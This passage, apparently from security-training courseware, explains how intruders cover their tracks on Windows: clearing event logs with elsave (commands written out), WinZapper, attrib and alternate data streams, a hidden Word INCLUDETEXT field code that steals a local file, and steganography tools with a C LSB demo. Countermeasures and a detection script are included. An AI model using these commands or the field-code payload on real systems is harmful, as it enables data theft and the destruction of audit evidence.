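        print(f"{when:%Y-%m-%d %H:%M:%S} {severity:6} {message}")
```

A 612 or 517 event attributed to an account that has no business changing audit settings is exactly the trace that auditpol and the Event Viewer "clear log" action leave behind.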

start sidebar
Tool: elsave.exe
  • elsave.exe is a simple tool for clearing the event log. The following syntax will clear the security log on the remote server 'rovil' (correct privileges are required on the remote system)

  • Save the system log on the local machine to d:\system.log and then clear the log:

     elsave -l system -F d:\system.log -C 
  • Save the application log on \\serv1 to \\serv1\d$\application.log:

     elsave -s \\serv1 -F d:\application.log 
end sidebar
 
Tools  

An attacker would be interested in clearing the event log after auditing has been disabled using auditpol.exe. One tool that will be of interest is elsave.exe. Written by Jesper Lauritsen, this tool helps clear the NT event log.

ELSave takes the following arguments:

-s \\server

Server for which you want to save or clear the log.

-F file

Save the log to a file with this name. Must be an absolute path to a local file on the server specified with -s. If -F is not specified the log is not saved.

-l log

Name of log to save or clear. Must be one of system, application or security. Default is application.

-q

Write errors and warnings to the application event log. Default is to write errors to stderr. This option is mostly useful when ELSave is run in the background, like for example from the scheduler.

-C

Clears the log. If -C is not specified the log is not cleared.

Example:

Save the application log on \\serv1 to \\serv1\d$\application.log:

  elsave -s \\serv1 -F d:\application.log  

Save the system log on the local machine to d:\system.log and then clear the log:

  elsave -l system -F d:\system.log -C  

start sidebar
Hacking Tool: WinZapper
  • WinZapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

  • To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then he presses 'delete events' and 'exit'. Presto the events disappear.

  • To sum things up: after an attacker has gained Administrators access to the system, one simply cannot trust the security log!

end sidebar
 
Tools  

It is generally assumed that event logs cannot be compromised without shutting the event logging service down, by legitimate means or otherwise. WinZapper is a tool that is capable of breaking into the event logging system without shutting it off or crashing the service.

No event is logged from the moment WinZapper is started to the point where the system is rebooted. This simulates the behavior of an authorized user who has audit privileges, except that here it is not a user but a program that poses as one. This is possible because WinZapper works on a copy of the log file that does not become the "real" log file until the system is rebooted.

All the attacker has to do is to run winzapper.exe and mark the event records to be deleted. He can then press "Delete events and Exit" and reboot Windows to re-enable the event logging system. However, he cannot revisit the Event Viewer again before rebooting. Another possibility is to start Winzapper, and then commence with the attack. In this way, none of the events are logged even though eventlog is running - an interesting facility to any attacker.

WinZapper can only be used from an Administrators account, and consequently does not exploit any security vulnerability in Windows NT / 2000. Apart from this, the attacker can use WinZapper to erase individual event records in the security log. This way, he can hide his tracks and remain obscure. If he chooses to, the attacker can inject fake event records into the security log. For this, he must be able to execute the program with Administrative privileges.

WinZapper can be tweaked to work remotely like a client/server system as well, depending on the attacker's ingenuity. In effect, after an attacker has gained Administrators access to the system, the security log cannot be entirely trusted.

start sidebar
Evidence Eliminator
  • Evidence Eliminator is an easy-to-use, powerful and flexible data cleansing system for Windows PCs.

  • Daily use protects you from unwanted data becoming permanently hidden in your PC.

  • It cleans recycle bins, Internet cache, system files, temp folders, etc.

end sidebar
 
Tools  

Evidence Eliminator is a Windows-based product that is known for countering privacy invasion and giving the user the ability to remove evidence of his activities on a system, such as websites visited, cookies stored, documents read, etc.

What brings this product into focus here is its ability to delete the following:

  • the Windows swap file, which provides virtual memory and is often filled with hidden evidence of all kinds;

  • Windows application logs;

  • Windows registry backups;

  • deleted filenames, with sizes and attributes, from drive directory structures;

  • free cluster space ("slack") from all file tips;

  • magnetic remanence from underneath existing files/folders;

  • all free unallocated space on all hard drives;

  • evidence of activity in many other programs, using plug-in modules;

  • slack space and deleted entries in the Windows registry;

  • created and modified dates and times on all files and folders and Windows registry streams; and

  • instant deletes of Windows registry data (NT4/2000/XP).

start sidebar
Hiding Files
  • There are two ways of hiding files in NT/2000.

    1. Attrib

      • use attrib +h [file/directory]

    2. NTFS Alternate Data Streaming

      • The NTFS file system used by Windows NT, 2000 and XP has a feature, Alternate Data Streams, that allows data to be stored in hidden streams linked to a normal visible file.

    Streams are not limited in size and there can be more than one stream linked to a normal file.

end sidebar
 
Concept  

Every file consists of a set of attributes. However, a file's name is not part of the file. The filename is a directory entry that points to the actual file. This level of indirection is necessary because Windows 2000 and Windows NT both support links. The directory entry can be considered to be analogous to a pointer - the unique filename and directory entry tells the file system which file to access. It is possible to have more than one pointer that points to the same data.

File attributes consist of several fields. The first field describes whether a file is system, hidden, read-only, archive, or one of several less typical attributes. The second field describes the creation time, access time, write time, and the size of the file. The functions GetFileAttributesEx() and GetFileInformationByHandle() retrieve this information.

ATTRIB.exe is used to display or change file attributes. It can be used by attackers to hide their files or even change the victim's file attributes.

Usage: ATTRIB [+attribute | -attribute] [pathname] [/S]

Key:

  • +: Turn an attribute ON

  • -: Turn an attribute OFF

pathname: Drive and/or filename, e.g. C:\*.txt

/S: Search the pathname including all subfolders.

attributes: H Hidden, S System, R Read-only, A Archive

If no attributes are specified during execution, attrib will return the current attribute settings. For example, to add the Hidden and System attributes for the test.txt file:

 ATTRIB +S +H TEST.TXT 

ATTRIB can be used with groups of files. It supports use of wildcards (? and *) with the filename parameter to display or change the attributes for a group of files. For example, to hide the directory C:\HIDE:

 ATTRIB +H C:\HIDE 

start sidebar
Creating Alternate Data Streams
  • Start by going to the command line and typing notepad test.txt

  • Put some data in the file, save the file, and close Notepad.

  • From the command line, type dir test.txt and note the file size.

  • Next, go to the command line and type notepad test.txt:hidden.txt. Type some text into Notepad, save the file, and close it.

  • Check the file size again and notice that it hasn't changed!

  • If you open test.txt, you see your original data and nothing else.

  • If you use the type command on the filename from the command line, you still get the original data.

  • If you go to the command line and type type test.txt:hidden.txt you get an error.

end sidebar
 
Concept  

In addition to the file attributes discussed previously, each file stored on an NTFS volume typically contains two data streams. The first data stream stores the security descriptor, and the second stores the data within a file.

Alternate data streams are another type of named data stream that can be present within each file.

Let us try creating an alternate data stream.

  1. In the lab, we invoke notepad from the command prompt by typing notepad ads.txt

  2. We save our document after entering some data into it. We check its size using the dir command and note it.

  3. We invoke notepad again from the command prompt by typing notepad ads.txt:hidden.txt (this is to hide the to-be-entered data). We type in the secret data and save the file. Once again we check the file size and note that it hasn't changed.

  4. What has happened to the secret data that was input? On opening ads.txt we do not see the new data, but are able to see the old original data.

  5. We return to the command prompt and type in ads.txt:hidden.txt

  6. We are told that the filename or path is invalid or that the file does not exist.

Using cat (a Windows port of the Unix cat utility) reveals the following:

 c:\>cat ads.txt             - this is a normal data stream 
 c:\>cat ads.txt:hidden.txt  - this is a hidden data stream 

Now that we have seen how alternate data streams are created, let us take a look at the security concerns.

Threat  

Alternate data streams do raise security concerns because an attacker might use these streams to hide files on a system. The primary reason why ADS is a security risk is because streams are almost completely hidden and represent a near perfect hiding spot on a file system. This can be taken advantage of by Trojans.

Threat  

Streams can be easily created, written to and read from, allowing any attacker to take advantage of a hidden file area. But while streams can easily be used, they can only be detected with special software. Programs such as Explorer can view normal parent files, but cannot see streams linked to the parent files or determine how much disk space is being used by these streams. As such, if a virus implants itself into an ADS stream, it is unlikely that normal security software will detect it. Streams, as they are essentially files, can be executed. Executed streams do not have their filenames displayed correctly in the Windows NT/2K/XP Task Manager, the utility commonly used to view running processes. For example, if the stream "c:\ads.txt:mystream" were running, the Windows Task Manager would only show "ads.txt". Streams can not only attach themselves to files, they can also attach themselves to directories. In addition, streams cannot be deleted - to delete a stream its parent must be deleted first. Streams attached to the root directory of a drive cannot be deleted.

start sidebar
Tools: ADS creation and detection
  • makestrm.exe moves the physical contents of a file to its stream.

  • ads_cat from Packet Storm is a utility for writing to NTFS's Alternate File Streams and includes ads_extract, ads_cp, and ads_rm, utilities to read, copy, and remove data from NTFS alternate file streams.

  • Mark Russinovich at www.sysinternals.com has released freeware utility Streams which displays NTFS files that have alternate streams content.

  • Heysoft has released LADS (List Alternate Data Streams), which scans the entire drive or a given directory. It lists the names and size of all alternate data streams it finds.

end sidebar
 
Tools  

Makestrm.exe is a utility that moves data from a command line specified file into a hidden alternate data stream attached to the original. For example, if one issues the command makestrm.exe c:\ads.exe, the file contents of c:\ads.exe would be moved into c:\ads.exe:alternatestream (an Alternate Data Stream), and the original file contents are then over-written with a simple message reminding the user about the linked stream.

Tools  

ads_cat from Packet Storm is a utility for writing to NTFS's Alternate File Streams and includes ads_extract, ads_cp, and ads_rm, utilities to read, copy, and remove data from NTFS alternate file streams.

Tools  

Mark Russinovich at www.sysinternals.com has released the freeware utility Streams, which displays NTFS files that have alternate stream content.

Tools  

Heysoft has released LADS (List Alternate Data Streams), which scans the entire drive or a given directory. It lists the names and size of all alternate data streams it finds.

start sidebar
NTFS Streams countermeasures
  • Deleting a stream file involves copying the 'front' file to a FAT partition, then copying back to NTFS.

  • Streams are lost when the file is moved to FAT Partition.

  • LNS.exe from http://ntsecurity.nu/cgi-bin/download/lns.exe.pl can detect streams.

end sidebar
 
Tools  

One of the best tools available for this is lads.exe, written by Frank Heyne. Lads.exe is currently available as version 3.01 and does an excellent job of reporting the presence of ADSs. For administrators used to working with graphical tools, note that lads.exe is a command line interface (CLI) tool that reports its findings to the screen. LNS is a tool that searches for NTFS streams (aka alternate data streams or multiple data streams). Not only does the utility report the presence of ADSs, it also reports the full path and size of each ADS. Even files that begin with ASCII characters or lie between two curly braces are found. Once an ADS is detected, Notepad can be used to view its contents. However, there is a catch. For example, the following command produces unexpected results:

 c:\ads>notepad myfile.txt:hidden 

When this command is executed, Notepad opens and asks if the user wishes to create a new file. This is strange because the ADS was created earlier. In order to observe the expected results enter the following commands:

 c:\ads>echo This is another ADS > myfile.txt:hidden.txt 
 c:\ads>notepad myfile.txt:hidden.txt 

The same effects can be observed when the ADS is associated with the directory listing, as in ":hidden.txt". The addition of the extension on the end of the filename allows the ADS to be opened in Notepad.

Other means include copying the cover file to a FAT partition and then moving it back; this loses the streams.

start sidebar
Stealing Files using Word Documents
  • Anyone who saves a Word document has a potentially new security risk to consider - one that no current anti-virus or Trojan scanner will turn up.

  • The contents of files on the victim's hard drive can be copied and sent outside the firewall without their even knowing.

  • The threat takes advantage of a special feature of Word called field codes.

  • Here's how it might work: someone sends the victim a Word document with a field-code bug. The victim opens the file in Word, saves it (even with no changes), then sends it back to the originator.

end sidebar
 

Word and Excel provide a mechanism through which data from one document can be inserted to and updated in another document. This mechanism, known as field codes in Word and external updates in Excel, can be automated to reduce the amount of manual effort required by a user. An example of the use of Word field codes could be the automatic insertion of a standard disclaimer paragraph in a legal document. An example of the use of external updates in Excel could be the automatic updating of a chart in one spreadsheet using data in a different spreadsheet.

A vulnerability exists because it is possible to maliciously use field codes and external updates to steal information from a user without the user being aware. Certain events, such as saving a document or the user manually updating the links, can trigger field codes and external updates to be refreshed. Normally the user would be aware of these updates occurring; however, a specially crafted field code or external update can be used to trigger an update without any indication to the user. This could enable an attacker to create a document that, when opened, would update itself to include the contents of a file from the user's local computer.

Attack Methods  

In order for an attacker to take advantage of this vulnerability, the attacker would need to perform the following steps:

  • Craft a Word or Excel document that exploits the vulnerability

  • Deliver it to the user, via email or some other method

  • Entice the user to open the document

  • Return the document to the attacker.

Field codes are markup codes that make it possible for dynamic content to be added to a document. For example, adding the {DATE} code to a document means that current date will be updated in the document whenever it is opened.

Inserting the following field structure into the footer of the last page will steal the contents of c:\sales.txt on the target computer.

Let us see an example:

  1. Alex sends Tom a Word document for revisions.

    Dear Tom,

    Please review the Pro-forma Purchase order for the material-101 at rate USD 2000 per unit. Kindly make appropriate corrections to the PO attached as word document and send it back to me ASAP for further actions.

    Regards,

    Alex

     {IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\Bonus.txt" "c:\Bonus.txt" } \* MERGEFORMAT } = " " " " \* MERGEFORMAT } 
  2. After Tom edits, saves and mails it back to Alex the file will also include contents of another file(s) from Tom's computer that Alex has specified.

  3. To achieve this, Alex embeds the INCLUDETEXT field into the document. The field results in inclusion of a specified file into the current document.

  4. Alex hides the field tag in the document by using hidden text, small white font, etc.

start sidebar
Field Code Counter measures
  • Use Hidden Field Detector. It's available free at:

    http://www.woodyswatch.com/util/sniff/

  • Hidden field Detector upon installation will install itself on your Word Tools Menu.

  • It scans your documents for potentially troublesome field codes, which you can't see easily, and even warns you when it finds something suspicious.

end sidebar
 

Mitigating factors:

The attacker would need to know the location of the file that he or she wanted to steal. If the correct filename were not presented, the attack would fail and an invalid field error message would be present in the document.

The user could always view the field codes or external updates. The field codes or external updates used in the attack can be revealed, as they are only hidden to prevent cluttering the document when it is being viewed or edited. A method of checking documents for additional undesired information is described in the Frequently Asked Questions below.

Although the attacker could take some steps to obscure the stolen information, the attacker would leave a clear audit trail. Since the field codes or external updates can be viewed, even if an attack is successful, the attacker would leave clear evidence in the document in the form of the stolen information and the malicious field codes used. This evidence could be used by law enforcement agencies if required.

The vulnerability would not enable the attacker to delete, modify or add any files to the user's local system.

In virtually all circumstances, the attacker would need to entice the user into returning the document. No information would be revealed unless the user returned the document to the attacker.

Countermeasure  

Countermeasures

  1. Use Hidden Field Detector. Follow the instructions enclosed with Hidden Field Detector, which will install itself on your Word Tools Menu. It scans your documents for potentially troublesome field codes, which you can't see easily and even warns you when it finds something you should check out.

  2. Open sent documents in WordPad and re-save them in Word 6 format. That erases all field codes implanted in the original document. The drawback is that it also deletes all information in headers and footers.

  3. Manually check the field codes. To display them in Word, go to: Tools > Options > View tab > Field Codes (checkbox). If you see anything in a field code that references filenames on your machine, take special notice. You can select and delete field codes easily once you know they're there.

  4. Check any document before sending it out of your company, especially if you get a warning from Hidden Field Detector. You might find your document is far larger after saving it than it was when you got it, even if you added no information. If you find a lot of blank space at the end of the document, try highlighting it and changing the font color to black.
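As an added example (not part of the original text, and not the Hidden Field Detector utility itself), the following script performs the manual check of step 3 automatically: it parses the nested field structure as Word displays it with field codes turned on, and reports any INCLUDETEXT, INCLUDEPICTURE or LINK field together with the local paths it references and the fields it is wrapped in. The sample field view is constructed from the IF/INCLUDETEXT structure shown above.

```python
"""Scanner for Word field codes that pull in local files (added example).

Operates on the text as Word displays it with field codes toggled on
(Alt+F9), where each field appears between braces and fields may nest,
exactly as in the {IF {INCLUDETEXT ...}} structure shown above.
"""
import re

# Word fields that fetch content from outside the document.
EXTERNAL_FIELDS = {"INCLUDETEXT", "INCLUDEPICTURE", "LINK"}

# Quoted local drive paths (c:\...) or UNC paths (\\server\...).
PATH_RE = re.compile(r'"((?:[A-Za-z]:\\|\\\\)[^"]*)"')

# Constructed sample: two harmless fields plus the hidden-include trick.
SAMPLE_FIELD_VIEW = (
    'Report generated { DATE }, page { PAGE }.\n'
    '{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\Bonus.txt" '
    '"c:\\Bonus.txt" } \\* MERGEFORMAT } = " " " " \\* MERGEFORMAT }'
)


class Field:
    def __init__(self, parent):
        self.parent = parent
        self.children = []
        self.code = ""            # text between this field's braces

    @property
    def kind(self):
        """Field type: the first word after the opening brace."""
        match = re.match(r"\s*([A-Za-z]+)", self.code)
        return match.group(1).upper() if match else ""

    def ancestors(self):
        """Kinds of enclosing fields, innermost first."""
        chain, node = [], self.parent
        while node is not None:
            chain.append(node.kind)
            node = node.parent
        return chain


def parse_fields(text):
    """Return top-level fields; nested fields are attached as children."""
    roots, stack, starts = [], [], []
    for i, ch in enumerate(text):
        if ch == "{":
            field = Field(stack[-1] if stack else None)
            (stack[-1].children if stack else roots).append(field)
            stack.append(field)
            starts.append(i)
        elif ch == "}":
            if not stack:
                raise ValueError(f"unbalanced '}}' at offset {i}")
            stack.pop().code = text[starts.pop() + 1:i]
    if stack:
        raise ValueError("unterminated field")
    return roots


def walk(fields):
    for field in fields:
        yield field
        yield from walk(field.children)


def find_external_includes(fields):
    """Report fields that would pull a local file into the document."""
    hits = []
    for field in walk(fields):
        if field.kind in EXTERNAL_FIELDS:
            paths = list(dict.fromkeys(PATH_RE.findall(field.code)))
            hits.append({"kind": field.kind, "paths": paths,
                         "enclosed_by": field.ancestors()})
    return hits


if __name__ == "__main__":
    for hit in find_external_includes(parse_fields(SAMPLE_FIELD_VIEW)):
        wrap = " > ".join(reversed(hit["enclosed_by"])) or "(top level)"
        print(f"{hit['kind']} reading {hit['paths']} nested in {wrap}")
```

An include that sits inside an IF whose result is an empty string is the signature of the trick described above: the file is pulled in and saved with the document, but nothing is shown on screen.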

start sidebar
What is Steganography?
  • The process of hiding data in images is called Steganography.

  • The most popular method for hiding data in files is to utilize graphic images as hiding place.

  • Attackers can embed information such as:

    1. Source code for hacking tool

    2. List of compromised servers

    3. Plans for future attacks

    4. your grandma's secret cookie recipe

end sidebar
 

It has been voiced that one of the shortcomings of various detection programs is their primary focus on streaming text data. What if an attacker bypasses normal surveillance techniques and still steals or transmits sensitive data? A typical situation would be where an attacker manages to get inside the firm as a temporary or contract employee and sneaks out sensitive information. While the organization may have a policy of not allowing electronic equipment into or to the outside from within, a determined attacker can still find a way with techniques such as Steganography.

Concept  

What is Steganography? It has been described as the art and science of hiding information by embedding messages within other seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images.

The lure of a steganography technique is that unlike encryption, steganography cannot be detected. When transmitting an encrypted message it is evident that communication has occurred, even if the message cannot be read. Steganography is used to hide the very existence of the message. An attacker can use it to hide information even when encryption is not a feasible option. From a security point of view steganography can be used to hide a file in an encrypted file so that even if the encrypted file is deciphered, the hidden message is not seen.

There are several free software tools available for steganography on the Internet. Today, steganography has evolved into a digital strategy of hiding a file in some form of multimedia, such as an image, an audio file (like a .wav or .mp3) or even a video file.

Tools  

Given below is a list of few steganography tools.

  • DiSi-Steganograph is a very small, DOS-based steganographic program that embeds data in PCX images.

  • EZStego is a Java based steganographic software which modifies the LSB of still pictures (supports only GIF and PICT formats) and rearranges the color palette.

  • Gif-It-Up v1.0 is a stego program for Windows 95 that hides data in GIF files. It replaces color indexes of the GIF color table with indexes of 'color friends' (a color friend is a color in the same table that is as close as possible).

  • Gifshuffle conceals a message in a GIF image by re-ordering the color map. Source code and a WIN32 executable are provided.

  • Hide and Seek is a stego program that hides any data into GIF images. It flips the LSB of pseudo-randomly chosen pixels. The data is first encrypted using the blowfish algorithm.

  • JPEG- JSTEG hides data inside a JPEG file. (Source code available)

  • MandelSteg and GIFExtract hide data in fractal GIF images. MandelSteg will create a Mandelbrot image (though it could be modified to produce other fractals), storing your data in the specified bit of the image pixels, after which GIFExtract can be used by the recipient to extract that bit-plane of the image. (Source code available)

  • MP3Stego hides data in popular MP3 sound files.

  • Nicetext transforms cipher-text into innocuous text which can be transformed back into the original cipher-text. The expandable set of tools allows experimentation with custom dictionaries, automatic simulation of writing style, and the use of Context-Free-Grammars to control text generation.

  • Pretty Good Envelope hides data in almost any file. In fact it embeds a binary message in a larger binary file by appending the message to the covert file as well as a 4-byte pointer to the start of the message. To retrieve the message, the last 4 bytes of the file are read, the file pointer is set to that value, and the file read from that point.

  • OutGuess is a steganographic tool for still images. It supports the PNM and JPEG image formats. OutGuess 'preserves statistics based on frequency counts. As a result, no known statistical test is able to detect the presence of steganographic content'.

  • SecurEngine hides files into 24 bit bitmap images (JPEG or BMP) or even text files. Files can be encrypted using GOST, Vernam or '3-way'.

  • Stealth is a simple filter for PGP 2.x which strips off all identifying header information. Only the encrypted data (which looks like random noise) remains; thus it is suitable for steganographic use.

  • Snow is used to conceal messages in ASCII text by appending white spaces to the end of lines.

  • Steganography Tools 4 encrypts the data with IDEA, MPJ2, DES, 3DES and NSEA in CBC, ECB, CFB, OFB and PCBC modes and hides it inside graphics (by modifying the LSB of BMP files), digital audio (WAV files) or unused sectors of HD floppies. The embedded message is usually very small.

  • Steganos is an easy to use wizard style program to hide and/or encrypt files. Steganos encrypts files and hides them within various different types of files. It also includes a text editor using the soft-tempest technology. Many other security features are included.

  • Steghide features hiding data in BMP, WAV and AU files, blowfish encryption, MD5 hashing of pass phrases to blowfish keys and pseudo-random distribution of hidden bits in the cover-data.

  • Stegodos is a set of DOS programs that encodes messages into GIF or PCX images. It works only with 320x200x256 pictures. The data embedded by modifying the LSB of the picture is noticeable in most cases.

  • Stegonosaurus is a UNIX program that will convert any binary file into nonsense text, but which statistically resembles text in the language of the dictionary supplied.

  • StegonoWav is a Java (JDK 1.0) program that hides information in 16-bit wav files using a spread spectrum technique.

  • wbStego lets you hide data in bitmaps, text files and also HTML files. The data is encrypted before embedding. Two different user interfaces are proposed: 'the wizard' guides the user step by step and the 'pro' mode gives him full control.

start sidebar
Tool: ImageHide
  • ImageHide is a steganography program that can hide large amounts of text in images.

  • Simple encryption and decryption of the hidden data.

  • Even after adding bytes of data there is no increase in image size.

  • The image looks the same in normal paint packages.

  • Loads from and saves to files; its author claims it gets past mail sniffers.

end sidebar
 
Tools  

One popular method is to hide messages in graphics, because other methods are losing their appeal: hiding information in protocol headers can be detected by a well configured firewall, and white space hidden in text documents is lost when the document is reformatted (for example in Word). Let us see how hiding information in graphics works.

Computers use binary format (zeros and ones) to represent both text and graphics. For text the standard is ASCII, in which each character is represented by seven data bits, with the eighth bit of the byte historically used for parity; an uppercase "A", for example, is 1000001. An image, in turn, is represented by pixels. Each pixel records the intensity of the three primary colours, red, green and blue, stored either as a single byte (eight bits, usually a palette index or a grey level) or as three bytes (twenty-four bits, one per colour). In an eight-bit greyscale image white is the binary value 11111111 and black is 00000000.

Let us get familiar with the terms used in steganography. The term 'cover object' refers to the carrier, such as an image, document or sound file. A steganographic tool (stego-tool) breaks the message to be embedded into individual bits and spreads them through the carrier. Often these tools require a password or other authentication phrase before the receiver can extract the message; this is referred to as the stego-key. The result of embedding the secret message in the cover object is the stego-object.

Threat  

Consider a scenario where a disgruntled employee wants to pass sensitive information to a competitor. He can use any high-resolution digital image (a desktop wallpaper, for instance) as a cover object. A 640 x 480 pixel image with 256 colours is about 300 KB of pixel data; hiding one bit per pixel, it can carry roughly one eighth of that, about 37 KB. High-resolution images are valued for their payload: a 1024 x 768 pixel image with 24-bit colour is about 2.3 MB of pixel data and, at one bit per colour byte, can carry roughly 290 KB.

We try our hand at steganography with ImageHide, a freeware tool available for download on the Internet at Dancemammal.com.


ImageHide warns the user not to save the embedded image in JPEG format, as data loss may occur. The reason is that JPEG is a lossy format: it transforms blocks of the picture with the discrete cosine transform and then quantises (rounds) the resulting coefficients, discarding the fine detail the eye does not notice. The rounding makes no visible difference to the image, but it destroys exactly the low-order bits in which an LSB tool has placed its data, so the embedded message is grossly damaged.

The other two popular formats, Windows Bitmap (BMP) and Graphics Interchange Format (GIF), are lossless: BMP normally stores the pixels uncompressed and GIF uses LZW compression, so the decoded image is an exact copy of the original and the low-order bits survive.

In the example shown above, we note that when ImageHide counts the colours in the original cover object it comes up with 577 colours, whereas the stego-object is found to have 594 colours. This brings us to the nature of these tools. There are two methods by which one can embed data in an image: Image Domain tools and Transform Domain tools. The former are also known as bit-wise tools because they operate on the least significant bit of each pixel or colour sample, that is, the rightmost bit of the byte, which changes the value by at most one. That bit is replaced with one bit of the message. The change is not visible in a high-resolution colour image, which is one of the reasons high-resolution images are preferred as covers, but it does alter the set of colour values present (hence the change from 577 to 594 above), and in a greyscale image with few distinct levels the alteration can be more noticeable.

Transform Domain tools are not affected by the cover image being in JPEG format because they use more complex algorithms such as the Discrete Cosine Transform (DCT) or wavelet transforms to embed the information in the coefficients the format actually stores. This category of tools withstands compression, cropping and image processing better. Examples are OutGuess and SysCop.
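As an added illustration of the bit-wise (LSB) embedding just described, the following C program (not code from ImageHide or from the courseware; the function names, the 4-byte length header and the constructed 64x64 greyscale cover are this example's own assumptions) embeds a short message one bit per sample, extracts it again, counts the distinct sample values the way ImageHide's colour count does, and then shows what happens when the stego-image is put through a crude model of a lossy codec that drops the two low-order bits of every sample, as JPEG quantisation does.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed 8-bit greyscale "cover": 64x64 samples generated from a formula,
 * standing in for the pixel data of a real BMP. (Assumption: one byte per pixel.) */
#define COVER_PIXELS (64 * 64)

void make_cover(uint8_t *px, size_t n)
{
    for (size_t i = 0; i < n; i++)
        px[i] = (uint8_t)((i * 7) % 251);       /* gradient-like, 251 distinct values */
}

/* One LSB per pixel: the payload capacity in bytes is pixels / 8. */
size_t lsb_capacity(size_t pixels) { return pixels / 8; }

/* Embed a 4-byte big-endian length header followed by msg, one bit per pixel,
 * most significant bit first, by replacing the lowest (rightmost) bit of each byte.
 * Returns 0 on success, -1 if the cover is too small. */
int lsb_embed(uint8_t *px, size_t npix, const uint8_t *msg, uint32_t len)
{
    if ((size_t)len + 4 > lsb_capacity(npix))
        return -1;
    uint8_t hdr[4] = { (uint8_t)(len >> 24), (uint8_t)(len >> 16),
                       (uint8_t)(len >> 8),  (uint8_t)len };
    size_t p = 0;
    for (size_t i = 0; i < (size_t)len + 4; i++) {
        uint8_t b = i < 4 ? hdr[i] : msg[i - 4];
        for (int k = 7; k >= 0; k--, p++)
            px[p] = (uint8_t)((px[p] & 0xFE) | ((b >> k) & 1));
    }
    return 0;
}

/* Read one byte back from eight consecutive LSBs starting at *p. */
static uint8_t lsb_read_byte(const uint8_t *px, size_t *p)
{
    uint8_t b = 0;
    for (int k = 0; k < 8; k++, (*p)++)
        b = (uint8_t)((b << 1) | (px[*p] & 1));
    return b;
}

/* Extract into out (cap bytes). Returns the payload length, or -1 if the
 * recovered header is implausible for this cover or does not fit in out. */
long lsb_extract(const uint8_t *px, size_t npix, uint8_t *out, size_t cap)
{
    size_t p = 0;
    uint32_t len = 0;
    for (int i = 0; i < 4; i++)
        len = (len << 8) | lsb_read_byte(px, &p);
    if ((size_t)len + 4 > lsb_capacity(npix) || len > cap)
        return -1;
    for (uint32_t i = 0; i < len; i++)
        out[i] = lsb_read_byte(px, &p);
    return (long)len;
}

/* The "colour count" ImageHide displays: number of distinct sample values. */
int distinct_values(const uint8_t *px, size_t n)
{
    int seen[256] = { 0 }, count = 0;
    for (size_t i = 0; i < n; i++)
        if (!seen[px[i]]++)
            count++;
    return count;
}

/* Crude stand-in for a lossy codec such as JPEG: drop the two low-order bits
 * of every sample. Visually negligible, fatal for an LSB payload. */
void lossy_requantise(uint8_t *px, size_t n)
{
    for (size_t i = 0; i < n; i++)
        px[i] &= 0xFC;
}

/* Embed, optionally "save as JPEG", extract. Returns 1 if the message
 * survives, 0 if it does not, -1 if embedding itself failed. */
int lsb_roundtrip(int lossy)
{
    static uint8_t px[COVER_PIXELS];
    uint8_t out[64];
    const char *msg = "meet at 0300";                /* constructed payload */
    make_cover(px, COVER_PIXELS);
    if (lsb_embed(px, COVER_PIXELS, (const uint8_t *)msg, (uint32_t)strlen(msg)) != 0)
        return -1;
    if (lossy)
        lossy_requantise(px, COVER_PIXELS);
    long n = lsb_extract(px, COVER_PIXELS, out, sizeof out);
    return n == (long)strlen(msg) && memcmp(out, msg, (size_t)n) == 0;
}

int main(void)
{
    static uint8_t px[COVER_PIXELS];
    make_cover(px, COVER_PIXELS);
    printf("capacity: %zu bytes, distinct values in cover: %d\n",
           lsb_capacity(COVER_PIXELS), distinct_values(px, COVER_PIXELS));
    printf("lossless round trip: %d, after lossy save: %d\n",
           lsb_roundtrip(0), lsb_roundtrip(1));
    return 0;
}
```

Compile with any C99 compiler and run: the lossless round trip succeeds and the lossy one fails, which is the reason behind ImageHide's warning. Handling a real BMP would additionally require parsing the file header and locating the pixel rows (which are padded to 4-byte boundaries); that is left out here.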

start sidebar
Tool: Mp3Stego
  • MP3Stego will hide information in MP3 files during the compression process.

  • The data is first compressed, encrypted and then hidden in the MP3 bit stream.

end sidebar
 

We have seen how images are manipulated to hide information. Another media format gaining much attention is the MP3 audio format. We will look at the MP3Stego tool here. Before discussing the tool, let us see why MP3 is useful in Steganography.

Masking is a phenomenon in which one sound interferes with human perception of another sound. Frequency masking occurs when two tones close in frequency are played simultaneously. In this case, the louder tone will mask the quieter tone. Temporal masking occurs when a low-level signal is played immediately before or after a stronger one. MPEG audio compression techniques exploit these characteristics. It is possible to exploit these masking techniques by inserting marks that are just above the truncation threshold of MPEG but still below the threshold of perception.

Tools  

Written by Fabien A. P. Petitcolas, MP3Stego hides information in MP3 files during the Layer III encoding process. The data is first compressed, then encrypted and finally hidden in the MP3 bit stream. The only way to remove it is to decompress the stream and recompress it, which deletes the hidden information. The hiding takes place at the heart of the Layer III encoder, in the inner_loop. This loop quantises the input data and increases the quantiser step size until the quantised data can be coded with the available number of bits. An outer loop checks that the distortion introduced by the quantisation does not exceed the threshold defined by the psychoacoustic model.

Tools  

Other tools of interest in this context include StegonoWav (by Peter Heist) - a Java program that hides information in 16-bit wav files using a spread spectrum technique.

start sidebar
Tool: Snow.exe
  • Snow is a whitespace steganography program and is used to conceal messages in ASCII text by appending whitespace to the end of lines.

  • Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If the built-in encryption is used, the message cannot be read even if it is detected.

end sidebar
 
Tools  

Written by Matthew Kwan, snow is a steganography tool that exploits the nature of whitespace: it conceals messages by appending whitespace to the end of lines in ASCII text. We mentioned earlier that whitespace steganography does not survive reformatting in applications such as Word, and that steganography differs from encryption in that its aim is to avoid detection rather than merely to resist reading.

Snow is subject to these limitations. Its basic assumption is that spaces and tabs are generally not visible in text viewers, so a message can be hidden without changing the text's visual appearance to the casual observer. Encryption is provided by the ICE algorithm in 1-bit cipher-feedback (CFB) mode; because ICE accepts an arbitrary key size, passwords of any length up to 1170 characters are supported. Snow also relies on the fact that trailing spaces and tabs occasionally occur naturally, so their mere presence is not enough to alert an observer who stumbles across them.

The snow program runs in two modes: message concealment and message extraction. The data is concealed in the text file by appending sequences of up to 7 spaces, interspersed with tabs, which usually allows 3 bits to be stored every 8 columns. The start of the data is indicated by an appended tab character, which allows mail and news headers to be inserted without corrupting the data.

